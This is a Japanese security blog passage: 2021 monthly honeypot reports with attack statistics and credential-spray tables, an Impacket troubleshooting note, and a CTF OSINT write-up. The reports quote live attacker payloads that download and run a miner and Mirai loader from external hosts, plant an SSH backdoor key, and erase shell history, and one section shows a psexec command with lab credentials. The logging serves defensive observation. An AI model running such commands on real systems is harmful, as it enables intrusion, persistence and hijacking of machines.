| 10 | www | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 11 | steam | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 12 | rustserver | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 13 | hduser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 14 | csgo | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 15 | carlos | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 16 | pgsql | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 17 | ftpadmin | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 18 | docker | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 19 | ts3server | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 20 | ftp | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 21 | wpuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 22 | wordpress | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 23 | rudder | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 24 | mcserver | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 25 | ts3 | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 26 | administrator | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 27 | admin | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 28 | deploy | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 29 | root | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 30 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 31 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 32 | test | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 33 | root@localhost | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 34 | ubuntu | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 35 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 36 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 37 | ansible | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 38 | oracle | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 39 | hadoop | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 40 | centos | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 41 | postgres | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 42 | ftpuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 43 | odoo | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 44 | esuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 45 | vagrant | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 46 | guest | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 47 | minecraft | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 48 | joplin | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 49 | cms | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 50 | cmsuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 51 | rust | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 52 | user | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 53 | jenkins | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 54 | mysql | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 55 | nagios | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 56 | deployer | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 57 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]253[.]199 | United States |
| 58 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]253[.]199 | United States |
| 59 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 60 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 61 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 62 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 63 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 64 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 65 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 66 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 67 | web | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 68 | git | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 69 | cisco | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 70 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]42[.]170 | United States |
| 71 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]42[.]170 | United States |
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 10月はセキュリティイベントが目白押しで楽しみな反面、通常業務以外の作業が多いので乗り切れて安堵している。
- CodeBlue のセッション動画は再度1日かけて全て見直したいと思う。
個人的にはAVTokyoに(オンラインだけど)初参加できて良かった。AVTOKYO バッジキット購入のため、山手線の移動ルートを考えながら追いついたのが一番の思い出。来年は自宅でOpen xINT CTFにも参加してみたい。
IPアドレス:120[.]79[.]156[.]2
Payload :
{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)49+(char)56+(char)53+(char)46+(char)49+(char)56+(char)49+(char)46+(char)49+(char)48+(char)46+(char)50+(char)51+(char)52+(char)47+(char)69+(char)53+(char)68+(char)66+(char)48+(char)69+(char)48+(char)55+(char)67+(char)51+(char)68+(char)55+(char)66+(char)69+(char)56+(char)48+(char)86+(char)53+(char)50+(char)48+(char)47+(char)105+(char)110+(char)105+(char)116+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}},"size":1}
↓
文字コード部分をPrintable形式にすると以下になる。
↓
wget http://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo
仮想通貨Moneroのminerをインストールさせるmalwareのようだ。
ELF binary #1:
— Vess (@VessOnSecurity) 2020年4月18日
http[:]//185.181.10.234/E5DB0E07C3D7BE80V520/networkservicehttps://t.co/iOCBqwWSR1
ELF binary #2:
http[:]//185.181.10.234/E5DB0E07C3D7BE80V520/sysguardhttps://t.co/M6OWCW9U82
Impacketモジュールの実行に失敗したとき
概要
ImpacketモジュールのGetNPUSers.pyやpsexec.pyを実行した際にエラーがでることがある。
┌──(root💀kali)-[~]
└─# ./GetUserSPNs.py <ドメイン名>/<ユーザ名>:<パスワード> -dc-ip <DCのIPアドレス> -request
Traceback (most recent call last):
File "./GetUserSPNs.py", line 42, in <module>
from pyasn1.codec.der import decoder
ImportError: No module named pyasn1.codec.der
┌──(root💀kali)-[~]
└─# python psexec.py <ドメイン名>/<ユーザ名>:<パスワード>@<ドメイン名>
Traceback (most recent call last):
File "psexec.py", line 33, in <module>
from impacket import version, smb
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 55, in <module>
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
原因と対策
python3-pyasn1 で動作するため、python2系で実行するとエラーになる。python3系で実行する。
pyasn1のインストール
┌──(root💀kali)-[~] └─# sudo apt-get install python3-pyasn1 python3-pyasn1-modules
Impacketモジュールの実行
┌──(root💀kali)-[~] └─# python3 GetUserSPNs.py <ドメイン名>/<ユーザ名>:<パスワード> -dc-ip <DCのIPアドレス> -request Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- ┌──(root💀kali)-[/home/kali/Desktop/impacket/examples] └─# python3 psexec.py active.htb/Administrator:Ticketmaster1968@active.htb Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation [*] Requesting shares on <ドメイン名>..... [*] Found writable share <共有名>
参考URL
ハニーポット運用(月次報告:2021年9月)
今月のTopics
2021年9月2日に、AWSの東京リージョンで大規模な障害が発生した。 2021年9月2日(JST)にAWS Direct Connect サービスの中断により東京リージョン(AP-NORTHEAST-1)で大規模な障害が発生した。
原因はDirect Connect ロケーションと東京リージョンのデータセンターネットワーク間のネットワーク機器の一部で障害が発生したため。午前7時半から障害が発生し、午後1時42分に障害復旧した。(停止時間はおよそ6時間12分)
▽スマートフォンで住所変更などを行う三菱UFJ銀行のアプリ
▽みずほ銀行のネットバンキングのアプリ
▽SBI証券など、ネット証券各社のサイトの一部でアクセスレスポンス低下
▽携帯電話会社のKDDIでも、スマホ決済の「au PAY」にて入金しにくいなどの影響
▽全日空では羽田空港などでチェックインを行うシステムに障害が発生
▽日本航空では貨物の情報に関わる一部のシステムに影響
パブリッククラウドが社会基盤として広く浸透していると共に、基幹システムにおけるパブリッククラウド利用の難しさを改めて考える障害だった。
基幹システムをリリースする上でパブリッククラウドを利用する場合は、大規模障害のリスク費用を見込む必要があるだろう。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年9月4日-2021年9月30日
運用期間:26日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 2,728,448 | 852,542 |
| 2 | Honeytrap | 1,273,466 | 695,801 |
| 3 | Dionaea | 781,324 | 326,267 |
| 4 | Heralding | 625,857 | 120,349 |
| 5 | Rdpy | 158,641 | 64,556 |
| 6 | Ciscoasa | 34,911 | 1,083 |
| 7 | Adbhoney | 30,935 | 15,477 |
| 8 | Mailoney | 14,339 | ▲2,016 |
| 9 | ElasticPot | 8,351 | 801 |
| 10 | ConPot | 3,204 | 1,708 |
| 11 | CitrixHoneypot | 3,058 | 1,539 |
| 12 | Tanner | 3,049 | ▲1,885 |
| 13 | Medpot | 832 | 690 |
- Result
- 先月から各ハニーポットへのアクセス推移は変化なし。
- 先月より観測期間が短いにもかかわらず全体アクセス量が多いことから、9月はアクセス量が多かったと判断される。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | China | 1,182,505 | 1(→) |
| 2 | Russia | 1,092,591 | 4(↑) |
| 3 | Netherlands | 696,241 | 2(↓) |
| 4 | United States | 625,600 | 3(↓) |
| 5 | India | 188,088 | 5(→) |
| 6 | Vietnam | 139,583 | 11(↑) |
| 7 | Brazil | 120,196 | 8(↑) |
| 8 | South Korea | 93,259 | 14(↑) |
| 9 | Singapore | 84,560 | 7(↓) |
| 10 | Indonesia | 80,611 | 9(↓) |
| 11 | Germany | 72,968 | 12(↑) |
| 12 | France | 61,991 | 6(↓) |
| 13 | Japan | 60,869 | 10(↓) |
| 14 | Taiwan | 57,376 | 17(↑) |
| 15 | Sweden | 49,960 | 圏外(↑) |
| 16 | Latvia | 49,828 | 18(↑) |
| 17 | Hong Kong | 44,732 | 15(↓) |
| 18 | Mexico | 42,134 | 16(↓) |
| 19 | United Kingdom | 41,848 | 13(↓) |
| 20 | Thailand | 39,474 | 19(↓) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 2,873,189 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 1,333 |
| 3 | CVE-2020-11910 | 47 |
| 4 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 45 |
| 5 | CVE-2014-2321 CVE-2014-2321 | 3 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 173,845 |
| 2 | admin | 12,600 |
| 3 | knockknockwhosthere | 11,924 |
| 4 | user | 5,966 |
| 5 | sa | 5,852 |
| 6 | hadoop | 5,356 |
| 7 | sh | 3,668 |
| 8 | postgres | 2,890 |
| 9 | 22 | 2,719 |
| 10 | oracle | 2,466 |
| 11 | test | 2,377 |
| 12 | git | 2,287 |
| 13 | mysql | 2,141 |
| 14 | (empty) | 1,846 |
| 15 | nproc | 1,604 |
| 16 | huawei | 1,539 |
| 17 | !root | 1,366 |
| 18 | 2Wire | 1,340 |
| 19 | guest | 1,242 |
| 20 | ubuntu | 1,238 |
| 21 | support | 1,114 |
| 22 | ftpuser | 777 |
| 23 | ftp | 706 |
| 24 | 0 | 696 |
| 25 | adm | 688 |
| 26 | debug | 687 |
| 27 | pi | 687 |
| 28 | 666666 | 686 |
| 29 | blank | 686 |
| 30 | unknown | 662 |
| 31 | www | 614 |
| 32 | administrator | 590 |
| 33 | web | 571 |
| 34 | default | 517 |
| 35 | nagios | 394 |
| 36 | www-data | 377 |
| 37 | anonymous | 335 |
| 38 | testuser | 332 |
| 39 | deploy | 308 |
| 40 | minecraft | 293 |
| 41 | server | 290 |
| 42 | teamspeak | 283 |
| 43 | data | 282 |
| 44 | tomcat | 281 |
| 45 | user1 | 277 |
| 46 | Admin | 255 |
| 47 | test1 | 254 |
| 48 | jenkins | 249 |
| 49 | demo | 248 |
| 50 | ts3 | 245 |
- Result
- 先月から確認され始めた
knockknockwhosthere(3位)のアクセスが継続して多い。SSH Scanning Activityが継続中のようだ。
- 先月から確認され始めた
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 34,796 |
| 2 | knockknockwhosthere | 11,924 |
| 3 | 123456 | 9,806 |
| 4 | (empty) | 6,768 |
| 5 | root | 5,124 |
| 6 | password | 3,926 |
| 7 | 123 | 3,600 |
| 8 | 1 | 3,042 |
| 9 | 12345 | 2,599 |
| 10 | 1234 | 2,215 |
| 11 | blank | 2,030 |
| 12 | nproc | 1,604 |
| 13 | 1q2w3e4r | 1,293 |
| 14 | 12345678 | 1,274 |
| 15 | test | 1,125 |
| 16 | Password | 1,066 |
| 17 | user | 986 |
| 18 | 0 | 917 |
| 19 | 1qaz2wsx | 908 |
| 20 | 666666 | 864 |
| 21 | 0 | 813 |
| 22 | support | 808 |
| 23 | ubnt | 784 |
| 24 | master | 772 |
| 25 | alpine | 748 |
| 26 | qwerty | 743 |
| 27 | backup | 710 |
| 28 | hi3518 | 693 |
| 29 | !ishtar | 688 |
| 30 | unknown | 682 |
| 31 | synnet | 675 |
| 32 | 123456789 | 663 |
| 33 | test123 | 652 |
| 34 | 123123 | 602 |
| 35 | abc123 | 584 |
| 36 | 111111 | 575 |
| 37 | pass | 487 |
| 38 | Passw0rd | 482 |
| 39 | 1234567 | 465 |
| 40 | vizxv | 464 |
| 41 | x | 434 |
| 42 | 123qwe | 411 |
| 43 | admin123 | 410 |
| 44 | p@ssw0rd | 342 |
| 45 | password123 | 332 |
| 46 | changeme | 324 |
| 47 | 123321 | 314 |
| 48 | P@ssw0rd | 311 |
| 49 | 1234567890 | 301 |
| 50 | passw0rd | 292 |
- Result
- miraiなどのIoT系マルウェアにハードコードされたパスワード、簡易なパスワードが今月も大部分を占めていた。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
10月はセキュリティ系のイベントが多くて楽しみである。
AVTokyoは是非とも参加したいね。(下戸ですけども... )senpai.loader関連のアクセスは無し。(ただサイト自体はまだ生きている模様だ。)
今月のアクセス。
9/5に1件だけ観測したbase64エンコードされたアクセス。Shellshcockの脆弱性をついてmalwareをダウンロードさせる動作のようだ。
ハニーポット運用(月次報告:2021年8月)
今月のTopics
情報セキュリティ10大脅威 2021 が公開された。 www.ipa.go.jp
「スマホ決済の不正利用」(個人編1位)
個人編の「第1位 スマホ決済の不正利用」は周辺諸国と比較してIT化が遅れてきた日本がキャッシュレス決済の推進により注力すべきセクターになる。まだまだ普及しないマイナンバーカードと連携したITサービスの普及に向けて新規に発足したデジタル庁の積極的な活動が高齢化率が世界1位となった日本の巻き返しの起爆剤となってほしい。
「テレワーク等のニューノーマルな働き方を狙った攻撃」(組織編3位)
組織編では「【3位】テレワーク等のニューノーマルな働き方を狙った攻撃」が新規にランクインしている。2020年から始まったリモートワークも体制が整いつつあり、今後はVPNより効率的なサービスのリリースが見込まれると期待したい。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年8月1日-2021年8月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1875906 | 159,463 |
| 2 | Honeytrap | 577665 | ▲248,060 |
| 3 | Heralding | 505508 | ▲682,837 |
| 4 | Dionaea | 455057 | 101,030 |
| 5 | Rdpy | 94085 | ▲12,205 |
| 6 | Ciscoasa | 33828 | ▲68 |
| 7 | Mailoney | 16355 | 1,831 |
| 8 | Adbhoney | 15458 | 6,191 |
| 9 | ElasticPot | 7550 | 6,329 |
| 10 | Tanner | 4934 | ▲341 |
| 11 | CitrixHoneypot | 1519 | ▲110 |
| 12 | ConPot | 1496 | ▲86 |
| 13 | Medpot | 142 | ▲6 |
- Result
- 他のハニーポットの調査件数が減る中でCowrieへのアクセスが継続して多かった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | China | 730,648 | 3(↑) |
| 2 | Netherlands | 567,144 | 1(↓) |
| 3 | United States | 492,469 | 4(↑) |
| 4 | Russia | 373,435 | 2(↓) |
| 5 | India | 99,081 | 9(↑) |
| 6 | France | 93,956 | 6(→) |
| 7 | Singapore | 85,728 | 8(↑) |
| 8 | Brazil | 78,177 | 13(↑) |
| 9 | Indonesia | 65,453 | 17(↑) |
| 10 | Japan | 61,394 | 10(→) |
| 11 | Vietnam | 60,102 | 11(→) |
| 12 | Germany | 56,065 | 15(↑) |
| 13 | United Kingdom | 55,834 | 20(↑) |
| 14 | South Korea | 54,772 | 14(→) |
| 15 | Hong Kong | 44,797 | 圏外(↑) |
| 16 | Mexico | 35,419 | 圏外(↑) |
| 17 | Taiwan | 29,191 | 圏外(↑) |
| 18 | Latvia | 26,666 | 16(↓) |
| 19 | Thailand | 26,552 | 圏外(↑) |
| 20 | Albania | 25,589 | 圏外(↑) |
- Result
- 中国が久しぶりに1位に返り咲いた。
- ロシアが久しぶりに4位へ後退。変わってアメリカが3位に上がった。まるでメダル争いのようだ。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,261,316 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 419 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 26 |
| 4 | CVE-2020-11910 | 1 |
| 5 | CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 | 1 |
- Result
- 新規の脆弱性なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 85,576 |
| 2 | admin | 43,240 |
| 3 | knockknockwhosthere | 16,731 |
| 4 | sh | 5,713 |
| 5 | test | 4,854 |
| 6 | user | 4,761 |
| 7 | sa | 4,166 |
| 8 | nproc | 3,685 |
| 9 | ubuntu | 3,673 |
| 10 | postgres | 3,163 |
| 11 | oracle | 2,433 |
| 12 | git | 2,142 |
| 13 | ftpuser | 1,960 |
| 14 | deploy | 1,444 |
| 15 | hadoop | 1,435 |
| 16 | 22 | 1,386 |
| 17 | guest | 1,337 |
| 18 | default | 1,291 |
| 19 | minecraft | 1,270 |
| 20 | mysql | 1,182 |
| 21 | support | 1,164 |
| 22 | www | 1,124 |
| 23 | testuser | 1,108 |
| 24 | teamspeak | 1,086 |
| 25 | nagios | 957 |
| 26 | server | 942 |
| 27 | user1 | 907 |
| 28 | web | 906 |
| 29 | administrator | 884 |
| 30 | ftp | 882 |
| 31 | (empty) | 866 |
| 32 | www-data | 855 |
| 33 | tomcat | 836 |
| 34 | ts3 | 812 |
| 35 | jenkins | 744 |
| 36 | student | 715 |
| 37 | teamspeak3 | 704 |
| 38 | test1 | 695 |
| 39 | tester | 693 |
| 40 | 2Wire | 685 |
| 41 | !root | 681 |
| 42 | dev | 674 |
| 43 | webmaster | 667 |
| 44 | alex | 663 |
| 45 | vbox | 647 |
| 46 | demo | 643 |
| 47 | steam | 629 |
| 48 | ts | 605 |
| 49 | sysadmin | 586 |
| 50 | testftp | 577 |
- Result
- knockknockwhosthere(3位)を新規に確認した。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | knockknockwhosthere | 16,731 |
| 2 | admin | 14,759 |
| 3 | 123456 | 11,421 |
| 4 | 123 | 5,127 |
| 5 | password | 4,426 |
| 6 | (empty) | 4,027 |
| 7 | nproc | 3,681 |
| 8 | 1 | 3,327 |
| 9 | 1234 | 3,299 |
| 10 | 12345 | 3,109 |
| 11 | root | 2,138 |
| 12 | test | 1,851 |
| 13 | 123123 | 1,442 |
| 14 | 12345678 | 1,413 |
| 15 | 1qaz2wsx | 1,248 |
| 16 | 1q2w3e4r | 1,226 |
| 17 | vizxv | 1,218 |
| 18 | blank | 1,052 |
| 19 | pass | 1,009 |
| 20 | qwerty | 983 |
| 21 | test123 | 958 |
| 22 | 123456789 | 952 |
| 23 | 123321 | 929 |
| 24 | a | 891 |
| 25 | P@ssw0rd | 794 |
| 26 | 123qwe | 790 |
| 27 | 111111 | 751 |
| 28 | abc123 | 733 |
| 29 | p@ssw0rd | 725 |
| 30 | user | 714 |
| 31 | passw0rd | 697 |
| 32 | admin123 | 633 |
| 33 | password123 | 630 |
| 34 | 1234567 | 629 |
| 35 | 12 | 535 |
| 36 | 1qaz@WSX | 520 |
| 37 | qwe123 | 508 |
| 38 | support | 471 |
| 39 | 666666 | 451 |
| 40 | pass123 | 423 |
| 41 | ubnt | 414 |
| 42 | 1q2w3e | 412 |
| 43 | changeme | 396 |
| 44 | qwer1234 | 393 |
| 45 | backup | 376 |
| 46 | master | 371 |
| 47 | 0 | 368 |
| 48 | q1w2e3 | 366 |
| 49 | qwerty123 | 351 |
| 50 | 1q2w3e4r5t6y | 332 |
- Result
- ユーザ名と同じ
knockknockwhosthereというパスワードのアクセスが急激に増加していた。
SANSのCowrieでも同様のSSH Scanning Activityを観測しているようだ
- ユーザ名と同じ
https://isc.sans.edu/ssh.htmlisc.sans.edu
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- massscanが0件だった。こんな日がくるとは...
- Zmapは相変わらず多い。
最後に
東京オリンピック開催期間直後の8月9日からuser : knockknockwhosthere/pass : knockknockwhosthereのSSH Scanning Activityが急激に増加していた。何らかの製品に起因するアカウントでもなく、特定の国ではなく各国よりアクセスがみられるためオリンピックに起因したものと推測している。
今月多かったアクセス。
コマンド :"cd ~ && rm -rf .ssh && mkdir .ssh && echo ""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
- 今月の面白かったアクセス。ビルゲイツ先輩?
IPアドレス:136.144.41.41 コマンド :cd /var/tmp ; curl -s -L -O 31.210.20.142/.billgates/.senpai.loader || wget --no-check-certificate 31.210.20.142/.billgates/.senpai.loader ; chmod 777 .senpai.loader ; ./.senpai.loader ; rm -rf .senpai.loader ; history -c ; rm -rf ~/.bash_history 接続元 :United States
このURL配下の.senpai.loaderへアクセスしてみると難読化されていないシェルスクリプトが表示される。
現役のMiraiのBotnetとのこと。
31.210.20.142がDropperサイトになる。.senpai.loaderは264行からなるシェルスクリプトで構成されており、環境に合わせて対応するmalwareがダウンロードされるようだ。
こんな感じのスクリプトが延々と...
危険なので、「でりとっ!」 (ばんばん)
setodaNoteCTF - Writeup (OSINT : secret_operation)
8/21(土) 21:00 JST~9/4(土) 21:00 JSTに開催されたsetodaNoteCTF に会社のチームで参加した。 他のチームメンバーの陰で解けた問題のWriteupを記載する。
OSINT
secret_operation
あなたと同僚は敵対組織が秘密裏に進めているオペレーションの調査を命じられました。 「どうやら事を起こそうとしているようだ。」 調査開始からしばらく経った頃、同僚からある画像が届きました。それはかなり不鮮明だったものの、どこかの Web ページを写したと思われる画像データでした。詳細を確認しようと同僚と連絡をとろうとしましたが返信はなく、同僚からの連絡はそれを最後に途絶えてしまいました。画像の Web ページを調査し敵対組織が秘密裏に進めているオペレーションを明らかにしなければ。 添付されたファイルを解析し、フラグを得てください。
添付ファイルの画像に記載された以下のURLへアクセスすると接続元の情報が表示される。
まずは添付ファイルの接続元が表示されるように偽装する必要があるようだ。
X-Forwarded-Forの指定によるアクセスではうまく偽装されないため、VPNかプロキシ経由であれば接続元が変更されることを確認した。今回は一時的にプロキシ経由でロシアのサンクト・ペテルブルグからつなげた。(OSのプロキシ設定と独立しているFirefoxのブラウザ設定のプロキシ設定を変更して確認すると便利かな~と思います。)
添付ファイルの画像と同じアクセス元でアクセスすることで得られた情報は3つになる。
①Twitterのアカウント
@aarron142857
②サイトのURL(basic認証が必要)
https://billowing-poetry-3254.setodanote.net
③ロシア語?のことわざ
Молодец против овец, а против молодца и сам овца.
